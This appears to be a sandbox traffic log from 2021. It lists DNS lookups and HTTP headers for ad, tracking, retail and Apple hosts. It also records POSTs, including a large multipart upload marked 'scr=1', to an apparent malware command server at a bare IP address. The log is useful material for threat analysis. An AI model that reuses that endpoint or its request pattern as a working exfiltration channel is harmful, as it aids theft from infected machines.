DNS438b44e68a18a815aaf4aa6ab.litix.ioRequest438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99
-
DNSkkftcbewtxqgjl9f0zxb9p10ug0i81630921346.uaid.imrworldwide.comRequestkkftcbewtxqgjl9f0zxb9p10ug0i81630921346.uaid.imrworldwide.comIN AResponsekkftcbewtxqgjl9f0zxb9p10ug0i81630921346.uaid.imrworldwide.comIN CNAMEd29sshy11yr8a1.cloudfront.netd29sshy11yr8a1.cloudfront.netIN A13.227.222.26d29sshy11yr8a1.cloudfront.netIN A13.227.222.128d29sshy11yr8a1.cloudfront.netIN A13.227.222.91d29sshy11yr8a1.cloudfront.netIN A13.227.222.126
-
DNStop.faqtoids.comRequesttop.faqtoids.comIN AResponsetop.faqtoids.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.allresultsweb.comRequesttop.allresultsweb.comIN AResponsetop.allresultsweb.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
GEThttp://pagead2.googlesyndication.com/pagead/gen_204?rt=thirdparty&ec=8&lid=18&sdkv=h.3.288.0%2Fn.ios.3.14.4%2FH443NM7F8H.CBSSportsApp&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.comRequestGET /pagead/gen_204?rt=thirdparty&ec=8&lid=18&sdkv=h.3.288.0%2Fn.ios.3.14.4%2FH443NM7F8H.CBSSportsApp&e=44745938&id=ima_native&c=3301102111823060&domain=imasdk.googleapis.com HTTP/1.1
Host: pagead2.googlesyndication.com
Connection: keep-alive
Connection: keep-alive
Accept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Referer: http://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 204 No Content
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 06 Sep 2021 09:42:34 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 0
-
DNStop.faqtoids.comRequesttop.faqtoids.comIN AResponsetop.faqtoids.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRequest438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140
-
DNStop.faqtoids.comRequesttop.faqtoids.comIN AResponsetop.faqtoids.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNSmediag2481ed.airspace-cdn.cbsivideo.comRequestmediag2481ed.airspace-cdn.cbsivideo.comIN AResponsemediag2481ed.airspace-cdn.cbsivideo.comIN CNAMEsportshq-gslb.cbsivideo.comsportshq-gslb.cbsivideo.comIN CNAMEgslb.sportshq.ns1.cbsivideo.comgslb.sportshq.ns1.cbsivideo.comIN CNAMEcs1858.wpc.nucdn.netcs1858.wpc.nucdn.netIN A152.199.6.81
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNStop.faqtoids.comRequesttop.faqtoids.comIN AResponsetop.faqtoids.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNStop.theresultsengine.comRequesttop.theresultsengine.comIN AResponsetop.theresultsengine.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSwww.gstatic.comRequestwww.gstatic.comIN AResponsewww.gstatic.comIN A142.251.36.3
-
DNStop.allresultsweb.comRequesttop.allresultsweb.comIN AResponsetop.allresultsweb.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.faqtoids.comRequesttop.faqtoids.comIN AResponsetop.faqtoids.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.theresultsengine.comRequesttop.theresultsengine.comIN AResponsetop.theresultsengine.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNSsecure-dcr.imrworldwide.comRequestsecure-dcr.imrworldwide.comIN AResponsesecure-dcr.imrworldwide.comIN CNAMEsecure-us.imrworldwide.comsecure-us.imrworldwide.comIN CNAMEsecure-origin.imrworldwide.comsecure-origin.imrworldwide.comIN CNAMEsecure-us-east-2.imrworldwide.comsecure-us-east-2.imrworldwide.comIN CNAMEcensus.us-east-2.nielsencollections.comcensus.us-east-2.nielsencollections.comIN A18.118.62.68census.us-east-2.nielsencollections.comIN A18.217.90.182census.us-east-2.nielsencollections.comIN A3.131.185.218census.us-east-2.nielsencollections.comIN A3.18.254.97census.us-east-2.nielsencollections.comIN A3.20.48.149census.us-east-2.nielsencollections.comIN A3.139.48.105census.us-east-2.nielsencollections.comIN A18.224.241.13census.us-east-2.nielsencollections.comIN A18.116.195.61
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRequest438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEwalmart-nosni.map.fastly.netwalmart-nosni.map.fastly.netIN A151.101.1.74walmart-nosni.map.fastly.netIN A151.101.65.74walmart-nosni.map.fastly.netIN A151.101.129.74walmart-nosni.map.fastly.netIN A151.101.193.74
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSssc-cms.33across.comRequestssc-cms.33across.comIN AResponsessc-cms.33across.comIN CNAMEpixel.33across.compixel.33across.comIN A208.100.17.180
-
DNSd10lpsik1i8c69.cloudfront.netRequestd10lpsik1i8c69.cloudfront.netIN AResponsed10lpsik1i8c69.cloudfront.netIN A52.222.137.93d10lpsik1i8c69.cloudfront.netIN A52.222.137.209d10lpsik1i8c69.cloudfront.netIN A52.222.137.37d10lpsik1i8c69.cloudfront.netIN A52.222.137.185
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A142.251.36.10
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A216.58.214.10
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A142.250.179.138
-
DNScdn.taboola.comRequestcdn.taboola.comIN AResponsecdn.taboola.comIN CNAMEtls13.taboola.map.fastly.nettls13.taboola.map.fastly.netIN A151.101.1.44tls13.taboola.map.fastly.netIN A151.101.65.44tls13.taboola.map.fastly.netIN A151.101.129.44tls13.taboola.map.fastly.netIN A151.101.193.44
-
DNSsettings.luckyorange.netRequestsettings.luckyorange.netIN AResponsesettings.luckyorange.netIN A172.67.75.100settings.luckyorange.netIN A104.26.10.16settings.luckyorange.netIN A104.26.11.16
-
DNSco.akisinn.infoRequestco.akisinn.infoIN AResponseco.akisinn.infoIN A34.117.177.88
-
DNScollector-pxu6b0qd2s.px-cloud.netRequestcollector-pxu6b0qd2s.px-cloud.netIN AResponsecollector-pxu6b0qd2s.px-cloud.netIN A35.186.220.184
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEwalmart-nosni.map.fastly.netwalmart-nosni.map.fastly.netIN A151.101.1.74walmart-nosni.map.fastly.netIN A151.101.65.74walmart-nosni.map.fastly.netIN A151.101.129.74walmart-nosni.map.fastly.netIN A151.101.193.74
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:42:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----0c6daff5aaefbe33461eebd8510d62fc
Host: 185.215.113.202
Content-Length: 48279
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:42:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSbeacon.walmart.comRequestbeacon.walmart.comIN AResponsebeacon.walmart.comIN CNAMEbeacon-cdn-custom.walmart.com.akadns.netbeacon-cdn-custom.walmart.com.akadns.netIN CNAMEbeacon-cdn.walmart.com.akadns.netbeacon-cdn.walmart.com.akadns.netIN A40.124.130.12
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEwalmart-nosni.map.fastly.netwalmart-nosni.map.fastly.netIN A151.101.1.74walmart-nosni.map.fastly.netIN A151.101.65.74walmart-nosni.map.fastly.netIN A151.101.129.74walmart-nosni.map.fastly.netIN A151.101.193.74
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://example.org/RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Age: 338211
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:42:56 GMT
Etag: "3147526947+gzip"
Expires: Mon, 13 Sep 2021 09:42:56 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB1E)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNStrc.taboola.comRequesttrc.taboola.comIN AResponsetrc.taboola.comIN CNAMEdualstack.tls13.taboola.map.fastly.netdualstack.tls13.taboola.map.fastly.netIN A151.101.1.44dualstack.tls13.taboola.map.fastly.netIN A151.101.65.44dualstack.tls13.taboola.map.fastly.netIN A151.101.129.44dualstack.tls13.taboola.map.fastly.netIN A151.101.193.44
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNStrc.taboola.comRequesttrc.taboola.comIN AResponsetrc.taboola.comIN CNAMEdualstack.tls13.taboola.map.fastly.netdualstack.tls13.taboola.map.fastly.netIN A151.101.1.44dualstack.tls13.taboola.map.fastly.netIN A151.101.65.44dualstack.tls13.taboola.map.fastly.netIN A151.101.129.44dualstack.tls13.taboola.map.fastly.netIN A151.101.193.44
-
DNSb.wal.coRequestb.wal.coIN AResponseb.wal.coIN CNAMEb.wal.co.edgekey.netb.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSv10.kidsautoios.comRequestv10.kidsautoios.comIN AResponsev10.kidsautoios.comIN A103.47.192.72
-
GEThttp://v10.kidsautoios.com/ipRequestGET /ip HTTP/1.1
Host: v10.kidsautoios.com
Pragma: no-cache
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon/10.8.24 CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
X-Powered-By: iThanh
Vary: Origin, Accept-Encoding
Access-Control-Allow-Credentials: true
Content-Type: text/html; charset=utf-8
Content-Length: 12
ETag: W/"c-T+jtdWoufQlJnZYss//Zp9PiBJU"
Set-Cookie: connect.sid=s%3Aa6u5eCTUAlb0zuq5MEvSrZXvPxlCZlA-.qSU%2FFShASM4Txg5tx3yRk25shAkmGUG5ss8hwsk7JeI; Path=/; Expires=Tue, 07 Sep 2021 09:43:08 GMT; HttpOnly
Date: Mon, 06 Sep 2021 09:43:08 GMT
Connection: keep-alive
Keep-Alive: timeout=5184
-
DNScl4.apple.comRequestcl4.apple.comIN AResponsecl4.apple.comIN CNAMEcl4-cdn.origin-apple.com.akadns.netcl4-cdn.origin-apple.com.akadns.netIN CNAMEcl4-cdn-us.origin-apple.com.akadns.netcl4-cdn-us.origin-apple.com.akadns.netIN CNAMEcl4.g.aaplimg.comcl4.g.aaplimg.comIN A17.253.53.204cl4.g.aaplimg.comIN A17.253.53.205
-
DNSiphone-ld.apple.comRequestiphone-ld.apple.comIN AResponseiphone-ld.apple.comIN CNAMEiphone-ld.origin-apple.com.akadns.netiphone-ld.origin-apple.com.akadns.netIN CNAMEiphone-ld.apple.com-v1.edgesuite.netiphone-ld.apple.com-v1.edgesuite.netIN CNAMEa1931.dscgi3.akamai.neta1931.dscgi3.akamai.netIN A2.22.22.211a1931.dscgi3.akamai.netIN A2.22.22.218a1931.dscgi3.akamai.netIN A2.22.22.225
-
DNScl5.apple.comRequestcl5.apple.comIN AResponsecl5.apple.comIN CNAMEcl5-cdn.origin-apple.com.akadns.netcl5-cdn.origin-apple.com.akadns.netIN CNAMEcl5.apple.com.edgekey.netcl5.apple.com.edgekey.netIN CNAMEe14868.dsce9.akamaiedge.nete14868.dsce9.akamaiedge.netIN A2.18.108.210
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEwalmart-nosni.map.fastly.netwalmart-nosni.map.fastly.netIN A151.101.1.74walmart-nosni.map.fastly.netIN A151.101.65.74walmart-nosni.map.fastly.netIN A151.101.129.74walmart-nosni.map.fastly.netIN A151.101.193.74
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNShblg.media.netRequesthblg.media.netIN AResponsehblg.media.netIN A2.16.118.158
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSp39-buy.itunes.apple.comRequestp39-buy.itunes.apple.comIN AResponsep39-buy.itunes.apple.comIN CNAMEp39-buy.itunes-apple.com.akadns.netp39-buy.itunes-apple.com.akadns.netIN CNAMEp39-buy-lb.itunes-apple.com.akadns.netp39-buy-lb.itunes-apple.com.akadns.netIN A17.120.252.47
-
DNSv10.kidsautoios.comRequestv10.kidsautoios.comIN AResponsev10.kidsautoios.comIN A103.47.192.72
-
GEThttp://v10.kidsautoios.com/ipRequestGET /ip HTTP/1.1
Host: v10.kidsautoios.com
Accept: */*
Pragma: no-cache
Connection: keep-alive
Cookie: connect.sid=s%3Aa6u5eCTUAlb0zuq5MEvSrZXvPxlCZlA-.qSU%2FFShASM4Txg5tx3yRk25shAkmGUG5ss8hwsk7JeI
User-Agent: kidsdaemon/10.8.24 CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
X-Powered-By: iThanh
Vary: Origin, Accept-Encoding
Access-Control-Allow-Credentials: true
Content-Type: text/html; charset=utf-8
Content-Length: 12
ETag: W/"c-T+jtdWoufQlJnZYss//Zp9PiBJU"
Date: Mon, 06 Sep 2021 09:43:16 GMT
Connection: keep-alive
Keep-Alive: timeout=5184
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEwalmart-nosni.map.fastly.netwalmart-nosni.map.fastly.netIN A151.101.1.74walmart-nosni.map.fastly.netIN A151.101.65.74walmart-nosni.map.fastly.netIN A151.101.129.74walmart-nosni.map.fastly.netIN A151.101.193.74
-
DNScollector-pxu6b0qd2s.px-cloud.netRequestcollector-pxu6b0qd2s.px-cloud.netIN AResponsecollector-pxu6b0qd2s.px-cloud.netIN A35.186.220.184
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEi5.walmartimages.com.cdn.cloudflare.neti5.walmartimages.com.cdn.cloudflare.netIN A104.18.98.31i5.walmartimages.com.cdn.cloudflare.netIN A104.18.99.31
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSwww.bing.comRequestwww.bing.comIN AResponsewww.bing.comIN CNAMEa-0001.a-afdentry.net.trafficmanager.neta-0001.a-afdentry.net.trafficmanager.netIN CNAMEwww-bing-com.dual-a-0001.a-msedge.netwww-bing-com.dual-a-0001.a-msedge.netIN CNAMEdual-a-0001.dc-msedge.netdual-a-0001.dc-msedge.netIN A131.253.33.200dual-a-0001.dc-msedge.netIN A13.107.22.200
-
DNStrc-events.taboola.comRequesttrc-events.taboola.comIN AResponsetrc-events.taboola.comIN CNAMEch-trc-events.taboola.comch-trc-events.taboola.comIN CNAMEch-vip001.taboola.comch-vip001.taboola.comIN A141.226.124.48
-
DNSwww.google.comRequestwww.google.comIN AResponsewww.google.comIN A142.250.179.132
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://example.org/RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 582105
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:43:22 GMT
Etag: "3147526947"
Expires: Mon, 13 Sep 2021 09:43:22 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB1B)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNSgraph.facebook.comRequestgraph.facebook.comIN AResponsegraph.facebook.comIN CNAMEapi.facebook.comapi.facebook.comIN CNAMEstar.c10r.facebook.comstar.c10r.facebook.comIN A31.13.64.16
-
DNSgraph.facebook.comRequestgraph.facebook.comIN AResponsegraph.facebook.comIN CNAMEapi.facebook.comapi.facebook.comIN CNAMEstar.c10r.facebook.comstar.c10r.facebook.comIN A31.13.64.16
-
DNSfirebaselogging-pa.googleapis.comRequestfirebaselogging-pa.googleapis.comIN AResponsefirebaselogging-pa.googleapis.comIN A142.250.179.202
-
DNSinappcheck.itunes.apple.comRequestinappcheck.itunes.apple.comIN AResponseinappcheck.itunes.apple.comIN CNAMEinappcheck-lb.itunes-apple.com.akadns.netinappcheck-lb.itunes-apple.com.akadns.netIN CNAMEinappcheck.itunes.apple.com.edgekey.netinappcheck.itunes.apple.com.edgekey.netIN CNAMEe69896.dscapi6.akamaiedge.nete69896.dscapi6.akamaiedge.netIN A96.16.53.203e69896.dscapi6.akamaiedge.netIN A96.16.53.206
-
DNSfirebase-settings.crashlytics.comRequestfirebase-settings.crashlytics.comIN AResponsefirebase-settings.crashlytics.comIN A142.250.179.131
-
DNSapi.opensooq.comRequestapi.opensooq.comIN AResponseapi.opensooq.comIN A99.83.128.214api.opensooq.comIN A75.2.101.104
-
DNSgoogleads.g.doubleclick.netRequestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A142.251.36.34
-
DNSchat-v2.opensooq.comRequestchat-v2.opensooq.comIN AResponsechat-v2.opensooq.comIN CNAMEchat.opensooq.comchat.opensooq.comIN A34.243.70.126chat.opensooq.comIN A52.208.58.141
-
DNSgraph.facebook.comRequestgraph.facebook.comIN AResponsegraph.facebook.comIN CNAMEapi.facebook.comapi.facebook.comIN CNAMEstar.c10r.facebook.comstar.c10r.facebook.comIN A31.13.71.1
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNSb.wal.coRequestb.wal.coIN AResponseb.wal.coIN CNAMEb.wal.co.edgekey.netb.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSvacatures.trovit.nlRequestvacatures.trovit.nlIN AResponsevacatures.trovit.nlIN A104.26.5.206vacatures.trovit.nlIN A172.67.70.240vacatures.trovit.nlIN A104.26.4.206
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNScl3.apple.comRequestcl3.apple.comIN AResponsecl3.apple.comIN CNAMEcl3-cdn.origin-apple.com.akadns.netcl3-cdn.origin-apple.com.akadns.netIN CNAMEcl5.apple.com.edgekey.netcl5.apple.com.edgekey.netIN CNAMEe14868.dsce9.akamaiedge.nete14868.dsce9.akamaiedge.netIN A2.18.108.210
-
DNSssl.google-analytics.comRequestssl.google-analytics.comIN AResponsessl.google-analytics.comIN CNAMEssl-google-analytics.l.google.comssl-google-analytics.l.google.comIN A142.250.179.200
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSst1.trov.itRequestst1.trov.itIN AResponsest1.trov.itIN CNAMEd95plydrcylq5.cloudfront.netd95plydrcylq5.cloudfront.netIN A13.227.222.102d95plydrcylq5.cloudfront.netIN A13.227.222.127d95plydrcylq5.cloudfront.netIN A13.227.222.60d95plydrcylq5.cloudfront.netIN A13.227.222.37
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSstatic.criteo.netRequeststatic.criteo.netIN AResponsestatic.criteo.netIN CNAMEstatic.par.vip.prod.criteo.netstatic.par.vip.prod.criteo.netIN A178.250.0.130
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEz-ljzi-i5-walmartimages-com.speedroute.netz-ljzi-i5-walmartimages-com.speedroute.netIN CNAMEz-walmart-dn2.speedroute.netz-walmart-dn2.speedroute.netIN A148.163.253.36
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSgraph.facebook.comRequestgraph.facebook.comIN AResponsegraph.facebook.comIN CNAMEapi.facebook.comapi.facebook.comIN CNAMEstar.c10r.facebook.comstar.c10r.facebook.comIN A31.13.64.16
-
